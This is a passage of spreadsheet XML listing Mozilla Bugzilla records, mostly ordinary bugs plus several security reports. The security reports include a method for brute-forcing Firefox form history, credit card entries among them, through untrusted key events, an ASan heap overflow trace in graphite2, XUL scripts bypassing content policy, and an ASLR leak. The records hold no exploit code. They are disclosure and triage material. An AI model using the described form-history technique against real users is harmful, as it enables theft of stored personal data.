          <t>[sg:moderate][3.6.x]</t>
        </is>
      </c>
      <c r="Q3964" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3964" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3964" t="inlineStr">
        <is>
          <t>mozilla2.0b9</t>
        </is>
      </c>
      <c r="T3964" t="n">
        <v>1</v>
      </c>
      <c r="U3964" t="n">
        <v>0</v>
      </c>
      <c r="V3964" t="n">
        <v>48</v>
      </c>
      <c r="W3964" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)
Build Identifier: 
After bug 511615 was fixed, untrusted key events still cause the autocomplete popup to appear. By detecting whether or not the popup was triggered for certain inputs, it is possible to enumerate / brute force form history. 
Detection of the popup can be achieved with a Java applet placed underneath the text input. The applet will receive events when the popup disappears because its screen area needs to be repainted. This has been tested only on Windows XP, and I wouldn't expect this to work under composited desktop environments like Vista Aero or MacOS X.
The technique I used in bug 511615 required user interaction to work. This method is fully automatic, but it takes longer to get the data as it performs a blind true/false search of the form history. The page also needs to be visible and focused for this to work. 
Although getting lots of data from searchbar-history takes a while, an attack targeted at credit card data stored in form history would be very quick since the search space is mostly numeric.
Reproducible: Always
Steps to Reproduce:
1. Send untrusted key events to text input field
Actual Results:  
Autocomplete popup appears if value of text field matches form history
Expected Results:  
Autocomplete popup should not appear</t>
        </is>
      </c>
      <c r="X3964" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3965">
      <c r="A3965" t="n">
        <v>217805</v>
      </c>
      <c r="B3965" t="inlineStr">
        <is>
          <t>2003-08-30 00:48:34 -0700</t>
        </is>
      </c>
      <c r="C3965" t="inlineStr">
        <is>
          <t>Graph reports are funny (Bug Charts/reports.cgi broken by server move)</t>
        </is>
      </c>
      <c r="D3965" t="inlineStr">
        <is>
          <t>2011-06-26 22:59:39 -0700</t>
        </is>
      </c>
      <c r="E3965" t="n">
        <v>1</v>
      </c>
      <c r="F3965" t="n">
        <v>1</v>
      </c>
      <c r="G3965" t="n">
        <v>7</v>
      </c>
      <c r="H3965" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3965" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J3965" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3965" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3965" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3965" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3965" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3965" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3965" t="inlineStr"/>
      <c r="Q3965" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3965" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3965" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3965" t="n">
        <v>1</v>
      </c>
      <c r="U3965" t="n">
        <v>0</v>
      </c>
      <c r="V3965" t="n">
        <v>28</v>
      </c>
      <c r="W3965" t="inlineStr">
        <is>
          <t>It looks like we closed about 15000 bugs and reopened about 8000, all on the
same day. This looks like it coinsides with the server move, so I'm blaming that.
The funny numbers are there regardless of what product you pick, and they don't
match the query results (eg NEW Tech-Evangalish bugs - query says 2379, the
graphs says about 200.</t>
        </is>
      </c>
      <c r="X3965" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3966">
      <c r="A3966" t="n">
        <v>1573051</v>
      </c>
      <c r="B3966" t="inlineStr">
        <is>
          <t>2019-08-11 12:30:18 -0700</t>
        </is>
      </c>
      <c r="C3966" t="inlineStr">
        <is>
          <t>Links with custom URIs to external applications are losing their fragments</t>
        </is>
      </c>
      <c r="D3966" t="inlineStr">
        <is>
          <t>2022-01-10 05:15:11 -0800</t>
        </is>
      </c>
      <c r="E3966" t="n">
        <v>1</v>
      </c>
      <c r="F3966" t="n">
        <v>1</v>
      </c>
      <c r="G3966" t="n">
        <v>3</v>
      </c>
      <c r="H3966" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3966" t="inlineStr">
        <is>
          <t>External Software Affecting Firefox</t>
        </is>
      </c>
      <c r="J3966" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="K3966" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3966" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3966" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3966" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3966" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3966" t="inlineStr"/>
      <c r="Q3966" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3966" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3966" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3966" t="n">
        <v>1</v>
      </c>
      <c r="U3966" t="n">
        <v>0</v>
      </c>
      <c r="V3966" t="n">
        <v>52</v>
      </c>
      <c r="W3966" t="inlineStr">
        <is>
          <t>Receive an e-mail with a link containing a reference, for example:
https://bugzilla.mozilla.org/show_bug.cgi?id=1552922#c9
Click on the link. In TB 69, the page opens to https://bugzilla.mozilla.org/show_bug.cgi?id=1552922 and not https://bugzilla.mozilla.org/show_bug.cgi?id=1552922#c9
Alice, can you please find the regression for us?</t>
        </is>
      </c>
      <c r="X3966" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3967">
      <c r="A3967" t="n">
        <v>623044</v>
      </c>
      <c r="B3967" t="inlineStr">
        <is>
          <t>2011-01-04 14:56:02 -0800</t>
        </is>
      </c>
      <c r="C3967" t="inlineStr">
        <is>
          <t>"All" selection in themes doesn't show themes across all messages via all platforms, but message via each platform</t>
        </is>
      </c>
      <c r="D3967" t="inlineStr">
        <is>
          <t>2011-06-23 09:29:15 -0700</t>
        </is>
      </c>
      <c r="E3967" t="n">
        <v>1</v>
      </c>
      <c r="F3967" t="n">
        <v>1</v>
      </c>
      <c r="G3967" t="n">
        <v>6</v>
      </c>
      <c r="H3967" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3967" t="inlineStr">
        <is>
          <t>Input</t>
        </is>
      </c>
      <c r="J3967" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3967" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="L3967" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3967" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3967" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3967" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3967" t="inlineStr"/>
      <c r="Q3967" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3967" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3967" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="T3967" t="n">
        <v>1</v>
      </c>
      <c r="U3967" t="n">
        <v>0</v>
      </c>
      <c r="V3967" t="n">
        <v>6</v>
      </c>
      <c r="W3967" t="inlineStr">
        <is>
          <t>Steps to Reproduce:
1. Go to input.mozilla.com/themes
2. Ensure "All" is selected under "platform"
3. Click on any theme
Actual Results:
All messages related to that theme under only under a specific platform
Expected Results:
All messages related to that theme should be available across all platforms which feedback is received on.</t>
        </is>
      </c>
      <c r="X3967" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3968">
      <c r="A3968" t="n">
        <v>1125734</v>
      </c>
      <c r="B3968" t="inlineStr">
        <is>
          <t>2015-01-26 00:52:26 -0800</t>
        </is>
      </c>
      <c r="C3968" t="inlineStr">
        <is>
          <t>Twitter edit profile page consistently crashes with the LastPass extension installed</t>
        </is>
      </c>
      <c r="D3968" t="inlineStr">
        <is>
          <t>2016-06-04 16:12:52 -0700</t>
        </is>
      </c>
      <c r="E3968" t="n">
        <v>1</v>
      </c>
      <c r="F3968" t="n">
        <v>1</v>
      </c>
      <c r="G3968" t="n">
        <v>3</v>
      </c>
      <c r="H3968" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3968" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3968" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3968" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3968" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3968" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3968" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3968" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3968" t="inlineStr">
        <is>
          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q3968" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3968" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3968" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T3968" t="n">
        <v>1</v>
      </c>
      <c r="U3968" t="n">
        <v>0</v>
      </c>
      <c r="V3968" t="n">
        <v>39</v>
      </c>
      <c r="W3968" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Build ID: 20150125030202
Steps to reproduce:
Visited Twitter’s edit profile page
Actual results:
Crash
Expected results:
No crash</t>
        </is>
      </c>
      <c r="X3968" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3969">
      <c r="A3969" t="n">
        <v>477979</v>
      </c>
      <c r="B3969" t="inlineStr">
        <is>
          <t>2009-02-11 02:13:03 -0800</t>
        </is>
      </c>
      <c r="C3969" t="inlineStr">
        <is>
          <t>XUL scripts skip some security checks</t>
        </is>
      </c>
      <c r="D3969" t="inlineStr">
        <is>
          <t>2013-08-25 17:59:14 -0700</t>
        </is>
      </c>
      <c r="E3969" t="n">
        <v>1</v>
      </c>
      <c r="F3969" t="n">
        <v>1</v>
      </c>
      <c r="G3969" t="n">
        <v>3</v>
      </c>
      <c r="H3969" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3969" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3969" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3969" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3969" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3969" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3969" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3969" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3969" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q3969" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3969" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3969" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3969" t="n">
        <v>1</v>
      </c>
      <c r="U3969" t="n">
        <v>0</v>
      </c>
      <c r="V3969" t="n">
        <v>42</v>
      </c>
      <c r="W3969" t="inlineStr">
        <is>
          <t>Created attachment 361729
Testcase
I experimented with different types of scripts and apparently XUL scripts don't trigger content policies. The result is for example that the scripts are loaded even though JavaScript is disabled (nsWebBrowserContentPolicy doesn't have a say about this). I attached a XUL document loading https://bugzilla.mozilla.org/js/util.js - LiveHTTPHeaders extension confirms that this script is loaded regardless of preferences.
Looking at nsXULDocument::LoadScript(), the download is apparently started without any checks at all. At least further down in nsXULDocument::OnStreamComplete() there is a call to nsScriptLoader::ShouldExecuteScript(), this must be the one preventing me from running a script from file:///. However, if I compare to nsScriptLoader - there are additionally calls to CheckLoadURIWithPrincipal() and CheckContentPolicy() in StartLoad(), both are missing for XUL scripts.</t>
        </is>
      </c>
      <c r="X3969" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3970">
      <c r="A3970" t="n">
        <v>526147</v>
      </c>
      <c r="B3970" t="inlineStr">
        <is>
          <t>2009-11-02 20:20:15 -0800</t>
        </is>
      </c>
      <c r="C3970" t="inlineStr">
        <is>
          <t>Assert l10nbuilds.ini file exists when setting up the l10n scheduler</t>
        </is>
      </c>
      <c r="D3970" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3970" t="n">
        <v>1</v>
      </c>
      <c r="F3970" t="n">
        <v>1</v>
      </c>
      <c r="G3970" t="n">
        <v>5</v>
      </c>
      <c r="H3970" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3970" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3970" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3970" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3970" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3970" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3970" t="inlineStr"/>
      <c r="Q3970" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3970" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3970" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3970" t="n">
        <v>1</v>
      </c>
      <c r="U3970" t="n">
        <v>0</v>
      </c>
      <c r="V3970" t="n">
        <v>9</v>
      </c>
      <c r="W3970" t="inlineStr">
        <is>
          <t>This is a follow-up to bug 524798.
To avoid losing l10n repacks for a month again, I submit that we should be asserting that the l10nbuilds.ini file actually exists at buildbot master startup and failing if it does not. 
Axel: is there a reason why we wouldn't be able to do a simple assert on the inipath in startService() in the l10n scheduler?</t>
        </is>
      </c>
      <c r="X3970" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3971">
      <c r="A3971" t="n">
        <v>1194006</v>
      </c>
      <c r="B3971" t="inlineStr">
        <is>
          <t>2015-08-12 15:51:33 -0700</t>
        </is>
      </c>
      <c r="C3971" t="inlineStr">
        <is>
          <t>Crash [@ unsigned long be::_peek]</t>
        </is>
      </c>
      <c r="D3971" t="inlineStr">
        <is>
          <t>2016-07-02 11:19:09 -0700</t>
        </is>
      </c>
      <c r="E3971" t="n">
        <v>1</v>
      </c>
      <c r="F3971" t="n">
        <v>1</v>
      </c>
      <c r="G3971" t="n">
        <v>3</v>
      </c>
      <c r="H3971" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3971" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3971" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K3971" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3971" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3971" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3971" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3971" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3971" t="inlineStr">
        <is>
          <t>sec-high+ without OTS [gfx-noted][adv-main43+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3971" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3971" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3971" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3971" t="n">
        <v>1</v>
      </c>
      <c r="U3971" t="n">
        <v>0</v>
      </c>
      <c r="V3971" t="n">
        <v>5</v>
      </c>
      <c r="W3971" t="inlineStr">
        <is>
          <t>The attached testcase crashes on graphite2 revision fa8d4398dded (run through the gr2fonttest command line utility).
Backtrace:
==19692==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd1 at pc 0x7fcc28c97e82 bp 0x7fff0c7d2af0 sp 0x7fff0c7d2ae8
READ of size 1 at 0x60200000efd1 thread T0
    #0 0x7fcc28c97e81 in unsigned long be::_peek&lt;1&gt;(unsigned char const*) /src/inc/Endian.h:77
    #1 0x7fcc28c97e81 in unsigned long be::_peek&lt;2&gt;(unsigned char const*) /src/inc/Endian.h:50
    #2 0x7fcc28c97e81 in unsigned long be::_peek&lt;4&gt;(unsigned char const*) /src/inc/Endian.h:50
    #3 0x7fcc28c97e81 in unsigned int be::peek&lt;unsigned int&gt;(void const*) /src/inc/Endian.h:55
    #4 0x7fcc28c97e81 in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) /src/Face.cpp:284
    #5 0x7fcc28caf5df in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&amp;, bool) /src/GlyphCache.cpp:248
    #6 0x7fcc28ca6211 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&amp;, unsigned int) /src/GlyphCache.cpp:123
    #7 0x7fcc28c93304 in graphite2::Face::readGlyphs(unsigned int) /src/Face.cpp:98
    #8 0x7fcc28c30a7b in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) /src/gr_face.cpp:54
    #9 0x7fcc28c33f79 in gr_make_face_with_ops /src/gr_face.cpp:89
    #10 0x7fcc28c33f79 in gr_make_file_face /src/gr_face.cpp:242
    #11 0x48ed05 in Parameters::testFileFont() const /gr2fonttest/gr2FontTest.cpp:618
    #12 0x49248b in main /gr2fonttest/gr2FontTest.cpp:770
    #13 0x7fcc28871ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #14 0x486c4c in _start (/build/gr2fonttest/gr2fonttest+0x486c4c)
0x60200000efd1 is located 0 bytes to the right of 1-byte region [0x60200000efd0,0x60200000efd1)
allocated by thread T0 here:
    #0 0x46df61 in __interceptor_malloc (/build/gr2fonttest/gr2fonttest+0x46df61)
    #1 0x7fcc28d25bfe in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) /src/FileFace.cpp:90
    #2 0x7fcc28c9779f in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) /src/Face.cpp:274
    #3 0x7fcc28caf5df in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&amp;, bool) /src/GlyphCache.cpp:248
    #4 0x7fcc28ca6211 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&amp;, unsigned int) /src/GlyphCache.cpp:123
    #5 0x7fcc28c93304 in graphite2::Face::readGlyphs(unsigned int) /src/Face.cpp:98
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/inc/Endian.h:77 unsigned long be::_peek&lt;1&gt;(unsigned char const*)
Shadow bytes around the buggy address:
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa[01]fa fa fa 00 04
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e4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19692==ABORTING
Note that this is on graphite2 trunk and without OTS in front of it. We tested this particular file in Firefox and it is rejected by OTS with:
glyf: invalid table offset
However, according to cdiehl that doesn't necessarily mean that the bug cannot be reached through OTS (e.g. by fixing up the testcase enough to make it through). Marking s-s until we confirmed that this bug cannot be reached/exploited with OTS enabled.</t>
        </is>
      </c>
      <c r="X3971" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3972">
      <c r="A3972" t="n">
        <v>1387171</v>
      </c>
      <c r="B3972" t="inlineStr">
        <is>
          <t>2017-08-03 11:35:08 -0700</t>
        </is>
      </c>
      <c r="C3972" t="inlineStr">
        <is>
          <t>Tabbar scrolls when exiting customize mode</t>
        </is>
      </c>
      <c r="D3972" t="inlineStr">
        <is>
          <t>2018-01-03 02:51:58 -0800</t>
        </is>
      </c>
      <c r="E3972" t="n">
        <v>1</v>
      </c>
      <c r="F3972" t="n">
        <v>1</v>
      </c>
      <c r="G3972" t="n">
        <v>2</v>
      </c>
      <c r="H3972" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3972" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3972" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K3972" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3972" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3972" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3972" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3972" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3972" t="inlineStr">
        <is>
          <t>[reserve-photon-visual][p3]</t>
        </is>
      </c>
      <c r="Q3972" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3972" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3972" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T3972" t="n">
        <v>1</v>
      </c>
      <c r="U3972" t="n">
        <v>0</v>
      </c>
      <c r="V3972" t="n">
        <v>18</v>
      </c>
      <c r="W3972" t="inlineStr">
        <is>
          <t>1. Use Ctrl+T to create lots of tabs so that the tabbar overflows
2. Click Customize in hamburger menu
3. Click some tab other than the customizing one
Result: the tabbar scrolls so that the clicked tab appears at the right side of the tabbar.
Expected: the tabbar should not scroll.
Pushlog: https://hg.mozilla.org/integration/autoland/pushloghtml?fromchange=ecbeb9354c24bac41419cfbd71ce107f86ea4619&amp;tochange=975e4a8c3e3e83af2ac54fa3691861f79186b48f</t>
        </is>
      </c>
      <c r="X3972" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3973">
      <c r="A3973" t="n">
        <v>1330769</v>
      </c>
      <c r="B3973" t="inlineStr">
        <is>
          <t>2017-01-12 12:47:45 -0800</t>
        </is>
      </c>
      <c r="C3973" t="inlineStr">
        <is>
          <t>ASLR leak via pointer scrambling in ShapeTable</t>
        </is>
      </c>
      <c r="D3973" t="inlineStr">
        <is>
          <t>2017-08-28 13:37:30 -0700</t>
        </is>
      </c>
      <c r="E3973" t="n">
        <v>1</v>
      </c>
      <c r="F3973" t="n">
        <v>1</v>
      </c>
      <c r="G3973" t="n">
        <v>3</v>
      </c>
      <c r="H3973" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3973" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3973" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3973" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3973" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3973" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3973" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3973" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3973" t="inlineStr">
        <is>
          <t>[adv-main51+][adv-esr45.7+] Disclosure date ~Jan 21 2017 (note Fx51 scheduled for Jan 24)</t>
        </is>
      </c>
      <c r="Q3973" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3973" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3973" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T3973" t="n">
        <v>1</v>
      </c>
      <c r="U3973" t="n">
        <v>0</v>
      </c>
      <c r="V3973" t="n">
        <v>30</v>
      </c>
      <c r="W3973" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1312001 +++
Bug 1312001 fixed many of the ASLR leak issues, but ShapeTable still has similar issues that need fixing.</t>
        </is>
      </c>
      <c r="X3973" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3974">
      <c r="A3974" t="n">
        <v>597460</v>
      </c>
      <c r="B3974" t="inlineStr">
        <is>
          <t>2010-09-17 10:58:32 -0700</t>
        </is>
      </c>
      <c r="C3974" t="inlineStr">
        <is>
          <t>Web Console scrolls to top when (at least) a filtered network event occurs</t>
        </is>
      </c>
      <c r="D3974" t="inlineStr">
        <is>
          <t>2018-06-13 10:21:13 -0700</t>
        </is>
      </c>
      <c r="E3974" t="n">
        <v>1</v>
      </c>
      <c r="F3974" t="n">
        <v>1</v>
      </c>
      <c r="G3974" t="n">
        <v>3</v>
      </c>
      <c r="H3974" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3974" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J3974" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3974" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3974" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3974" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3974" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3974" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3974" t="inlineStr">
        <is>
          <t>[patchclean:1122]</t>
        </is>
      </c>
      <c r="Q3974" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3974" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3974" t="inlineStr">
        <is>
          <t>Firefox 4.0b8</t>
        </is>
      </c>
      <c r="T3974" t="n">
        <v>1</v>
      </c>
      <c r="U3974" t="n">
        <v>0</v>
      </c>
      <c r="V3974" t="n">
        <v>21</v>
      </c>
      <c r="W3974" t="inlineStr">
        <is>
          <t>Whenever a network event occurs that is hidden per the user's filter options, the Web Console scrolls to the top. Because this behavior makes the Web Console extremely difficult to use when network events are turned off (which will commonly be the case), I'm nominating this bug for Firefox 4 blocking status.</t>
        </is>
      </c>
      <c r="X3974" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3975">
      <c r="A3975" t="n">
        <v>1273701</v>
      </c>
      <c r="B3975" t="inlineStr">
        <is>
          <t>2016-05-17 17:25:07 -0700</t>
        </is>
      </c>
      <c r="C3975" t="inlineStr">
        <is>
          <t>pixman image ref-counting races with cairo solid colors</t>
        </is>
      </c>
      <c r="D3975" t="inlineStr">
        <is>
          <t>2016-09-22 17:22:38 -0700</t>
        </is>
      </c>
      <c r="E3975" t="n">
        <v>1</v>
      </c>
      <c r="F3975" t="n">
        <v>1</v>
      </c>
      <c r="G3975" t="n">
        <v>3</v>
      </c>
      <c r="H3975" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3975" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3975" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K3975" t="inlineStr">
        <is>
          <t>32 Branch</t>
        </is>
      </c>
      <c r="L3975" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3975" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3975" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3975" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3975" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main47+][adv-esr45.2+]</t>
        </is>
      </c>
      <c r="Q3975" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3975" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3975" t="inlineStr">
